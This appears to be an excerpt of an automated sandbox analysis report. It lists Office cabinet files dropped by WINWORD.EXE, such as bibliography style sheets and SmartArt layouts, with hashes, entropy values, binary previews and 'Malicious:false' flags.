                                                                                                                                              Preview:MSCF....c.......D...........................c....?..................................ThemePictureAlternatingAccent.glox.................Content.inf...3.....[.... .qq...........\<.^......o."......f.o...x.{..q..^.MH^...........{0.K....4pX.i...@6A4X.P.01d....'p.......zA.......... .......7.......a. `.=!@- ......>G.s.k~@.a.lfha:m....1...@.,G`....{....W..N..qs.......j.+TrsT.l.9..L...1+...d..-u..-.......).#u&...3......k.&C...DdZ.'.......8..<PF..r.eq.X6...u..v...s5.m.Q.l.G%.<.]....RV<...S..Dv..s.r.......dh.N.3-.Hf'.....3.GZ..E.kt.5......h...|...?!.L....~.)..v....:2.../F.,....o.qi.i7..E.|.mh.R_.@A.FO@i.....Feo...x.l...{E.\W9|V...=#..3..(......tP.:i....Ox.U.N...%6...p.6&.....<zh.z.|.<Z.?.k....y7m...F.Z$-.:.l.h...{T..7....?..T...d,r...z?../...`/Z......a.v@)....u......V..v.:.._.|.'..[..O.s.OAt-."b.In"..I...J*.~H.:-...?..uV....dZ;z:.l.{.E.,.Q..i]:.0r.I.y..f...../j.wN...^R.....u....>..}....f.f...]A..C~;/....%..^#..N.a..........99.....`.....%..iS....S......$....)

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab67FD.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 9170 bytes, 2 files, at 0x44 "InterconnectedBlockProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):25314
                                                                                                                                              Entropy (8bit):7.729848360340861
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:75V23GNhfG/YvmBqWDP7G8E0GftpBjEB1vrFLrHRN7mKll7PK/pRU0:LS/Yvc7TG8Pi6BLm6IS0
                                                                                                                                              MD5:C47E3430AF813DF8B02E1CB4829DD94B
                                                                                                                                              SHA1:35F1F1A18AA4FD2336A4EA9C6005DBE70013C7FC
                                                                                                                                              SHA-256:F2DB1E60533F0D108D5FB1004904C1F2E8557D4493F3B251A1B3055F8F1507A3
                                                                                                                                              SHA-512:6F8904E658EB7D04C6880F7CC3EC63FCFE31EF2C3A768F4ECF40B115314F23774DAEE66DCE9C55FAF0AD31075A3AC27C8967FD341C23C953CA28BDC120997287
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF.....#......D............................#...?...................#..............InterconnectedBlockProcess.glox......#..........Content.inf...<.:#.$[......O..........5f.P.5CU..6..jT..U..U..UM.T.........h................-... .......6...`.....G...........'.,DN:........... "..4..1u.....%.u..{{,....@lp..}..`.......Z...K.....Z..... Z4.<?..C.BF.....k.!Hl...]...Tvf..g....)...vny6.'..f....Z.R.`.......+....!..!.....:..4fj....."q..f..E..^!k.....M.c....R...B......g...~.........o.'.7,.e.,..7.R.e,(.+..+:....Q....f...P.H.I..U.....Jl...l...z.]7...C...<...L.,..@...i.{..e]K...2..KRW..7.-'.G.l!.n7..J.v.C...%/.....q...@..l..e..$..N..sg8]oo.(q(_.?.X.s...Ua..r0...Rz.o.eT.j...b*..}",n.qou..M.[.;%../c.x.4.z.2*.U.]..D...h...-R.$.=\3..P......N.mP......J...}BPn...g]d.5k..C.ee.ml...\.g...[.......<..6$.%.I#S9..I...6.i........_..P.n....c$.3..zw.hF......_{.+...o...[.&........&...M..m.....;....0....D7...4nQ.=/.._`._.nh.D.m..h.+....8..p..q.4.w.\...iy...*...lN6F..c.

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab67FE.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 12767 bytes, 2 files, at 0x4c "ieee2006officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):28911
                                                                                                                                              Entropy (8bit):7.7784119983764715
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:WnJY165YD0tPYoCKa3HueqRyzVscLk1Yj2GjcgbA8E0GftpBjE2kWTpjFLrHRN7N:X4rtPzCK6uRoljXBA8Pi62ZphL0HRA5p
                                                                                                                                              MD5:6D787B1E223DB6B91B69238062CCA872
                                                                                                                                              SHA1:A02F3D847D1F8973E854B89D4558413EA2E349F7
                                                                                                                                              SHA-256:DA2F261C3C82E229A097A9302C8580F014BB6442825DB47C008DA097CFCE0EE4
                                                                                                                                              SHA-512:9856D88D5C63CD6EBCF26E5D7521F194FA6B6E7BF55DD2E0238457A1B760EB8FB0D573A6E85E819BF8E5BE596537E99BC8C2DCE7EC6E2809A43490CACCD44169
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF.....1......L............................1...?...................0......"}..............ieee2006officeonline.xsl.:...............Content.inf.........[...G."...3$pE...G B....m3o[...I2&.f.,\..........}.n..{..e.8!^.3.A@...x..... .D.52gU..]..."..N8....s..CS..J3..HV...m...y..o....F.z......V.j._....=~k.....'.dY........1........#...d13.g.&C...C.xw.`f.hf..........]M....m.m....ud...,+.H~..cL...e#;(RI...eA....I.b...E...2..(...$.j...L...$..A....'[...H9..&..G.Q....".M.yl....]..?j%+....O~.*....|.se...K\.B"W..F.5.......=s...l.Y...K..yN.TBH[...sTWR.N.d...WEa....T.d.K.^sauI......m..s=.,qso5.b.V.s.]..9..,k4.\..L.;D...........;r.C...7.w.j..:N8.V6..a.3..j:A.mA..To..$.5....:./..p.x.3.=..__...8.EB.K.*..].-."..5-XU..J.....=o..K.Wavg.o].z.9.gk.._.........MZ.<.5............OY.n.o...r.9v.c.......[n.[..D...d..}.j.....LB,]_.9..St.@..C....\...^....-&.njq..!P....G^.....w.7.p~.......M..g.J............t1......q.w.rx...qp.....E.........-...2..G.........z.]B........d....C.@...@.

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab67FF.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 15338 bytes, 2 files, at 0x4c "gosttitle.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):31482
                                                                                                                                              Entropy (8bit):7.808057272318224
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:LgHv7aLOcoLGQ4EykdrHwLa+A8Pi6Iv8ACIa:LwvWyx4EykdTwLaWP7I0ACIa
                                                                                                                                              MD5:F10DF902980F1D5BEEA96B2C668408A7
                                                                                                                                              SHA1:92D341581B9E24284B7C29E5623F8028DBBAAFE9
                                                                                                                                              SHA-256:E0100320A4F63E07C77138A89EA24A1CBD69784A89FE3BF83E35576114B4CE02
                                                                                                                                              SHA-512:00A8FBCD17D791289AC8F12DC3C404B0AFD240278492DF74D2C5F37609B11D91A26D737BE95D3FE01CDBC25EEDC6DA0C2D63A2CCC4AB208D6E054014083365FB
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF.....;......L............................;...?...................;......................gosttitle.xsl.$...............Content.inf....v....[...=..Ic.32.E...`o.............m....4uk[.,.......{...}k{.R@(Hq..68nv...@.D.....$...j....8Q..........8.8........3...*.bi?Wt...:(..J.;&eii..io.w..z...`.'..i.MLR@.>....N..3`P.>$X@(r.#.D..(....P"_..I.$o.. L!y...I...H.........{.{....{.3....7..w..{w.2sn.dYn.lW...l...c$.UH....L6. .D$$...!F.!... .D............_..'.`.Q.v>..Z..f.n.l....0o.......bK...?s..eO....'.>t......S'..........~....h...v&7:q.x9|qs...%....:..D...ag.....e..'...".A.Y..?w"....p1t.9J.~.4.........~vj.n.8.;.O......../.}..io{p...e...\m.d`.gAm.......1"...N*...8..g"......~..[.e+.....\6i4.....%...Rq.U-p?..4P..4.f.?N.vI?.M\i.;.s..E.L.hu.*...\..5....N......]......\`...rS.\g.....2..!a).?.l.!i.^.t.u...x...g/.A..v.E...\.@.>kM...&.g.....%.......{.....2..E.g...'..[w...N.w..& 4M.a.cu.%:...\.D..Q..C.'fm..i....@._......QI.. ....h..|fB.il.(`..h.d;.l...`.s:

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab6800.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 15461 bytes, 2 files, at 0x4c "gostname.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):31605
                                                                                                                                              Entropy (8bit):7.820497014278096
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:7SpOUxgQ9gFodHZktfHa2TSmcAg76j8/xorK0JoZgbA8E0GftpBjE2PzFLrHRN7S:OngHltf7Bcp/xoB3A8Pi625D8RA54
                                                                                                                                              MD5:69EDB3BF81C99FE8A94BBA03408C5AE1
                                                                                                                                              SHA1:1AC85B369A976F35244BEEFA9C06787055C869C1
                                                                                                                                              SHA-256:CEBE759BC4509700E3D23C6A5DF8D889132A60EBC92260A74947EAA1089E2789
                                                                                                                                              SHA-512:BEA70229A21FBA3FD6D47A3DC5BECBA3EAA0335C08D486FAB808344BFAA2F7B24DD9A14A0F070E13A42BE45DE3FF54D32CF38B43192996D20DF4176964E81A53
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF....e<......L...........................e<...?...................;......................gostname.xsl."...............Content.inf.[.......[...>..|..32.E..o`h....W.>.^...v..5...m.w.$.U..U......m.mu...'4....m`.9F.. ...I..PTS..O.D...GM#...#CUE.`.`%n..N...G,.~..+.6cv.L...G.m.Y..vy.....Yh9/.m,..wtw..;....Ka.a.{.\...'.....<X....%)...G..d......R./..4$..32..@....f.h....w..ov.}w..[.....{.v.......dr..&w#G..$3.zI&f..(C..L.z5J... .`...!.!4. ...!.` .$........w.J.X7.w_..@.w..f]=.C.....I-....s.s_.x...~..A... ...z...nM..;....Z....vt....6...~.w.....*x.g.h.T.J..-.3=....G.n..ti.A...s...j$.Bf..?......6.t.<j...>.."....&=BO?w.uN.o.t.-r..K....>C..^G..p...k...>.xZ.[fL..n.."].W#...|.i.0W.q.F: ..<#w......w....s....."...n.qu.../rI.....q....P~.B..|b?.N.}..MyO..q..:q.7..-~.xa.S...|.....X.....g.W.3.mo..yy.GG.s>....qy....r........#.F.P..A.......A....b.2..14.8.i6..w.S...v~{0z.<.Z...^!.;2mSV.i....{...U...+...r.;...h.++..T6.a...$....j5F+..1t....b......|.Q\d-.S..2... ......Y..A...s....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab6801.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 15418 bytes, 2 files, at 0x4c "harvardanglia2008officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):31562
                                                                                                                                              Entropy (8bit):7.81640835713744
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:yhsBScEWkrljntbzuMmWh7ezPnGgbA8E0GftpBjohgsRFLrHRN7ybll7PK/p:MsBScwtnBmWNeTzA8PiuWsvyDI
                                                                                                                                              MD5:1D6F8E73A0662A48D332090A4C8C898F
                                                                                                                                              SHA1:CF9AD4F157772F5EDC0FDDEEFD9B05958B67549C
                                                                                                                                              SHA-256:8077C92C66D15D7E03FBFF3A48BD9576B80F698A36A44316EABA81EE8043B673
                                                                                                                                              SHA-512:5C03A99ECD747FBC7A15F082DF08C0D26383DB781E1F70771D4970E354A962294CE11BE53BECAAD6746AB127C5B194A93B7E1B139C12E6E45423B3A509D771FC
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF....:<......L...........................:<...?..................D;.......V..............harvardanglia2008officeonline.xsl.L...............Content.inf.Vu......[...E..o..3D.5..nF.A..+.e.....6r..f........M3...-.s.m.... $r.b.!.q!.....G...0.\.......fd......%m...'1Y..f..O...*.#.P.,{..m...|..ww.{.m...f...n%...,..y...0y...8.Q...`.../.q....a...',.V......8.7..8t..................6.]..6..nw..ynm..-l.Y..,.I?..$....+b9$E!S@"..) .4........H...lA...@!a.F.l$..0#!.....n&.5j.t+..1f|.+....E.zDk.l8.+<q.^.........\5.l..iT.9...........Y..6.^,.o.bn.E*5w..s.../...W.gS..j9..'W.F......].4\Mzz..Td..Ho..~.Q...Z..D..O.JP..m..s.j.:..........y._.....#.*.rD....60.\!y........p.o3,..Ub,......[[L.{.5.....5.7UDB9.{;;g.z.z..jM.G.MY.oe.....(r..B6..CV.7Fl.Z/....-.O.vY.c...-..........b.T)3.u..f~x2.?.8.g.x.-.....Qt_...$e.l..jtP..b....h..*.sW0.`.....c...F_....t.........LC..*5I.X$^.;&....#.._\J..........;..wP..wX.qy.qs...}46..fK.XN.&0........k1....8...............'t.......}.......O_.

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab6812.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 14813 bytes, 2 files, at 0x4c "iso690nmerical.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 7 datablocks, 0x1203 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):30957
                                                                                                                                              Entropy (8bit):7.808231503692675
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:rKfgT03jNkAFbgUQWtxq9OGh1bBkd/1MVHb5iVOdMgbA8E0GftpBjEl8tFLrHRNF:r303jOrUQAkfhopWHbA8Pi6l8zuUIq
                                                                                                                                              MD5:D3C9036E4E1159E832B1B4D2E9D42BF0
                                                                                                                                              SHA1:966E04B7A8016D7FDAFE2C611957F6E946FAB1B9
                                                                                                                                              SHA-256:434576EB1A16C2D14D666A33EDDE76717C896D79F45DF56742AFD90ACB9F21CE
                                                                                                                                              SHA-512:D28D7F467F072985BCFCC6449AD16D528D531EB81912D4C3D956CF8936F96D474B18E7992B16D6834E9D2782470D193A17598CAB55A7F9EB0824BC3F069216B6
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF.....9......L............................9...?...................8......1P..............iso690nmerical.xsl.................Content.inf...A@...[...5.....33.E...P.../..........5sv.]3srm8.T.=.......}.v.T.. ..4IH.r.%Z.(.q.\+K..[,....E....A......#CEF..}p..Y/s$...YKI.#M.?.t.1#C....I..v.vn...-...v7../S.m.Ma.....!.Y....4.......3.3....c&R9..%......(J..BDMI.>7J.....".....}.w.}w.wg.v...^.n.{....{f.mlI..%.#..I..S....D..QJ U......4........K.(@....DH.....}...8;..z...&0%e..G.OAM..x.3......\....zS9....}......89.B...e.W.p{;.....m.m3...}....../...q.~..;.,..".j.g..^N............iC.../|...g.=..9.Q].Gf.....QA....74..v.....9.n[......0.}..jo{y./.2..Ym......;u...b.(Jz^.....~..uM...{s../..#.)n2..S.S.c..6)U.V....!.'R.......P.S.D..S.p/......D.......{......?.u.",...Mp._....N..+..=Y#..&0w....r.......$.xwC......P.e7.>O....7....].y%q^S'....*.C.`.?..}Q..k../u.TK...y........S...{T.?......[.H.'L..AS.Y.|*..b...J.H-.^U>'9..uD[.".b[.l.......o..6.L).h.B0RJa.b..|m:.):......F

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab6813.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 14864 bytes, 2 files, at 0x4c "mlaseventheditionofficeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):31008
                                                                                                                                              Entropy (8bit):7.806058951525675
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:ktH7oN/HbwiV+M+4Jc+5UrT3czi5uOHQA8Pi6DxUR/WTZIy:87sPEANXJc+eTMsuzP7DmN0ZIy
                                                                                                                                              MD5:E033CCBC7BA787A2F824CE0952E57D44
                                                                                                                                              SHA1:EEEA573BEA217878CD9E47D7EA94E56BDAFFE22A
                                                                                                                                              SHA-256:D250EB1F93B43EFB7654B831B4183C9CAEC2D12D4EFEE8607FEE70B9FAB20730
                                                                                                                                              SHA-512:B807B024B32E7F975AED408B77563A6B47865EECE32E8BA993502D9874B56580ECC9D9A3FEFA057FDD36FB8D519B6E184DB0593A65CC0ACF5E4ACCBEDE0F9417
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF.....:......L............................:...?...................9......................mlaseventheditionofficeonline.xsl.L...............Content.inf.N.#.....[...>..9..3c.5...F.B.]Y.3..%d.8...v;....~Y.L.=..v..m.g...|K.B....$......s.......#CdE.p.p..@...j.Nl2'...L..N.G:-V:.d.....i..M........mK.w.....\W.<.`..b$.!..!3..rT.A..#.).;KZ...a.-..j&e`R.~7dIRS.I..f.ff....}.}....^[wo.uw..i.m7......v$.I..n....-.Z.M5...iH..Ea..., [..0.L...DH..." ..... .@...H.@..+...}.......*^..'.4*.tHa..f].gV..~.7V.....C..).(.U"..f.@l..j'..%\.u.UU.....9<13...5..=........./..Z..{..-.L].+Y.fL.<EJ.q..!.j....W..]E./.~Y>...GgQ..-....Q.C..5..T+...fO. .)..~.7..Y....+..U=.e..8w.m...._..S..v.d.* ......S3z.X)......u...t.......i.;.a...X.Ji....g.3.!.O.....T.f6..[U....O..Z.X.q.G....?.k]..?...8.u.;].8y.T.9D..!?R....:........3+.P.....7?m}..............1...y3.g.\c.ks^;?.f.U5...U.j....E.N.}.!.......).R1....~.....R.....3.J.f...l..E^:...&_..%..v...^..E...rC..O....M.#..<..H..bB.+.W..

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab6814.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 4091 bytes, 2 files, at 0x44 "BracketList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):20235
                                                                                                                                              Entropy (8bit):7.61176626859621
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:j3W3yGyjgbA8E0GftpBjEHvFLrHRN7pDAlI66Yv1:j3WFyAA8Pi6HVpDZ66c1
                                                                                                                                              MD5:E3C64173B2F4AA7AB72E1396A9514BD8
                                                                                                                                              SHA1:774E52F7E74B90E6A520359840B0CA54B3085D88
                                                                                                                                              SHA-256:16C08547239E5B969041AB201EB55A3E30EAD400433E926257331CB945DFF094
                                                                                                                                              SHA-512:7ED618578C6517ED967FB3521FD4DBED9CDFB7F7982B2B8437804786833207D246E4FCD7B85A669C305BE3B823832D2628105F01E2CF30B494172A17FC48576D
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF............D................................?..................................BracketList.glox.................Content.inf....7r...[.... G.q..@...B.....?X!.A.......!........X..Vk.JK...Z..=......PD.....P....5...jp..+..T....b.)np5.7.....Zz........... ..!.....S......1....`....h......T?.Nq../......z....[..:..5f;....O...d.FxD...4...Z....[..a...w..W.[..P...5.]...6..."...+t].!...2\%%`Q.\..)...=>.)......a.$.2.,...2,.Lw.?..+..qf....h....T/B.....}T.E...'.%.....,.......X....b..gt.hPYc|.....a...j...=...{..a.`!8!..|...L.T..k..!,.R.z/W....{..,...+..w.m..sQ..7<x..B....?....\.)..l...d...}.....v..W.C..'=p1c.Z=.W.g.e....&wm..N,..K.T../.oV../=9.}.....".28...r.Q....dzj{....S...1m...x9_...2PXpa...Q.n.$z...c..SGq...k......}kPE..*...3.|.5A.>..6.......+)qCB....q....qNkGe...W]..o..Z...J.<.i......qq.8....q..BE.(...._h.U.\@3.F...KdO..=1j+....).*Q.|B..Z..%......LDYk....j.....{klDW..#CVy}...X..O!..}..s..&..DC.....tL.j..b.......[...n.'..1..Xc...9Q..gM.....n..3...v.....~.).

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab6815.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 14939 bytes, 2 files, at 0x44 "CircleProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):31083
                                                                                                                                              Entropy (8bit):7.814202819173796
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:0XbSq3W46TVZb5fOFo1HtZwGqtRT44hS+nyBoiuFgbA8E0GftpBjEcBFLrHRN7Ku:0XpOflfOFo1DMr/iuuA8Pi6cfKjW66b
                                                                                                                                              MD5:89A9818E6658D73A73B642522FF8701F
                                                                                                                                              SHA1:E66C95E957B74E90B444FF16D9B270ADAB12E0F4
                                                                                                                                              SHA-256:F747DD8B79FC69217FA3E36FAE0AB417C1A0759C28C2C4F8B7450C70171228E6
                                                                                                                                              SHA-512:321782B0B633380DA69BD7E98AA05BE7FA5D19A131294CC7C0A598A6A1A1AEF97AB1068427E4223AA30976E3C8246FF5C3C1265D4768FE9909B37F38CBC9E60D
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF....[:......D...........................[:...?...................A..............CircleProcess.glox......A..........Content.inf......9.B[.....@*........!...(A.D..K.W.wwpwJj\.K\w...]...K.!.....@0..?,...}won`... ....&I..(;.....X.u..^.R..^......_:....W>f\....T...B..i`|q.....................i.5....(........0q7@.@..F...?A.`.....,L.......5.+../56..a`....1C5..9.*I.N.......@|<+./......... .ya....>l.,t.......y.y5...FF.,F..jCA...SA..H....8u.L..eM?.w8.......~^.Mr.[...(.._......u..+.......j..TJ.:<.3.X`...U.bz...[...r-...[...+..B.......}...\'.i...C.8.B_...c.8</..s.....VQ.Y..m.,.j~;y ...2.5.VQ...K..jP..2..r-...HA...."..9).7.....5.E._.wq.......!.+n+.f...s].4M'.1&...5....4..k..NV.M1.7`a..<.P4.|.mrd.i.R...u...............v.}..n\.C$.....[..2c.^..W..g..._.0.C.o....%.z.!.;.@y.`\..UO#i.)...Q...........L. .\:_..H.{.W...@...T.4..A.a...Wo?o$4.....#.V.s8M.Gh..p?A...Y.....)...........r|...!..o9...8..%#.[....;...3<Z...g....~.Z....,.(...qA.'x#..xC..@...HOuW.[.[....c.........

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab6816.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 16689 bytes, 2 files, at 0x4c "iso690.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):32833
                                                                                                                                              Entropy (8bit):7.825460303519308
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:+0TU06CkaUYMoi//YX428RaFA8Pi6e9iA4I3w:vICTm/QorUpP7eAA4I3w
                                                                                                                                              MD5:205AF51604EF96EF1E8E60212541F742
                                                                                                                                              SHA1:D436FE689F8EF51FBA898454CF509DDB049C1545
                                                                                                                                              SHA-256:DF3FFF163924D08517B41455F2D06788BA4E49C68337D15ECF329BE48CF7DA2D
                                                                                                                                              SHA-512:BCBA80ED0E36F7ABC1AEF19E6FF6EB654B9E91268E79CA8F421CB8ADD6C2B0268AD6C45E6CC06652F59235084ECDA3BA2851A38E6BCD1A0387EB3420C6EC94AC
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF....1A......L...........................1A...?..................S@......v...............iso690.xsl.................Content.inf.B.9.....[...A.c...32.E...P..'.^}.f...ikMJ....m..s..U.w{m{{...}n.4........I. ..9..d..I.......P|....F...F.......&&J.:I.34......+*M3..4mr.........m.r..m)....dK.wiw...H,...r........y.$..Cu...L...dH.../..V......g.PG$R39...4O..............{w..^....c.m.m.o.....#..Fgs..6.....b....3.I..O....B..B..1h"....K|f .41......_..g.N.<.>........(....o3a.M)....J..}....-......8.......g.hm!r<...-..1.1....q.?....S.m...`L.g#.K.igv.].ghD....L...p5..?.......iP.[JS.J..?z~.T/.Q...E.K.......P+\LW.-.c..[9.n.7.....P...*[.A1....m...4h.9...N[....h5 n%k.~RR.*c..n..=...4....).eH.-./..>....*.r..S.*..dE.........pF..s.A..?...f..u.+.{..?>N.4].}Xb.M......y......'.2..'..........J4{r..r.3........5>..a0.>.u_.y@g....+y.yu--,ZdD.........5]3..'.s...|.....K.....T..G.G.e...)..\x..OM.g...`..j0......BfH...+.....:......l`.qU...;.@...",.."........>;P.B.^F...3!......Rx.9..

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab6817.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 17466 bytes, 2 files, at 0x4c "chicago.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 10 datablocks, 0x1203 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):33610
                                                                                                                                              Entropy (8bit):7.8340762758330476
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:IlFYcxiahedKSDNAPk5WEEfA8Pi6xnOKMRA58:2JitdKsNAM5WBDP7xOKMq58
                                                                                                                                              MD5:51804E255C573176039F4D5B55C12AB2
                                                                                                                                              SHA1:A4822E5072B858A7CCA7DE948CAA7D2268F1BB4B
                                                                                                                                              SHA-256:3C6F66790C543D4E9D8E0E6F476B1ACADF0A5FCDD561B8484D8DDDADFDF8134B
                                                                                                                                              SHA-512:2AC8B1E433C9283377B725A03AE72374663FEC81ABBA4C049B80409819BB9613E135FCD640ED433701795BDF4D5822461D76A06859C4084E7BAE216D771BB091
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF....:D......L...........................:D...?..................XC.....................chicago.xsl. ...............Content.inf.!..B...[...H."m..3C.6...WP!i/Z..vn._...^omvw+...^..L.4o...g..y......^..x...BH.B.K....w.....F........p ./gg.h.0I',.$..a.`.*...^..vi..mw..........K....oQ............P...#...3.......U(.=...q.~?..H..?.'I4'.......X...}w.vw.....f.n..f{3.....-....%dK&q..D.H.Z..h-..H.[$ %.."..e....1...$.............'.....B..%..4...&`S!DQ...M.......N~............S..'....M..4E.^..dej..i..+.`...6F%sJ....Q..d.(*.s.Z...U-5Eh.s.CK...K..X$......j..T.?.`.|...=..R...-7...*...TU.....7a...&I.noOK|.W.R-+S.d..rR.....{h.Y...)..xJ..=.XM..o...P'.I4m..~I..C..m.....f.....;{Mzg+Wm.~...z...r-.....eK...lj:^.1g5...7.h(T"..t?5......u.....G.Z<..sL.\{...8=t...Z...'tps.:...|....6.....S..X...I...6l.M.....aq.;YS....{:.&.'.&.F.l...\.[L.%.so\.v.Lo...zO.^^...p..*9k...).CC..F0>L...VUE4.......2..c..p.rCi..#...b.C@o.l.. E_b..{d...hX.\_!a#.E.....yS.H...aZ...~D3.pj: ss?.]....~

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab6818.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 15327 bytes, 2 files, at 0x4c "sist02.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):31471
                                                                                                                                              Entropy (8bit):7.818389271364328
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:eNtFWk68dbr2QxbM971RqpzAA8Pi6TlHaGRA5yr:eNtEkpGSbuHAkP7TlHaGq54
                                                                                                                                              MD5:91AADBEC4171CFA8292B618492F5EF34
                                                                                                                                              SHA1:A47DEB62A21056376DD8F862E1300F1E7DC69D1D
                                                                                                                                              SHA-256:7E1A90CDB2BA7F03ABCB4687F0931858BF57E13552E0E4E54EC69A27325011EA
                                                                                                                                              SHA-512:1978280C699F7F739CD9F6A81F2B665643BD0BE42CE815D22528F0D57C5A646FC30AAE517D4A0A374EFB8BD3C53EB9B3D129660503A82BA065679BBBB39BD8D5
                                                                                                                                              Malicious:false
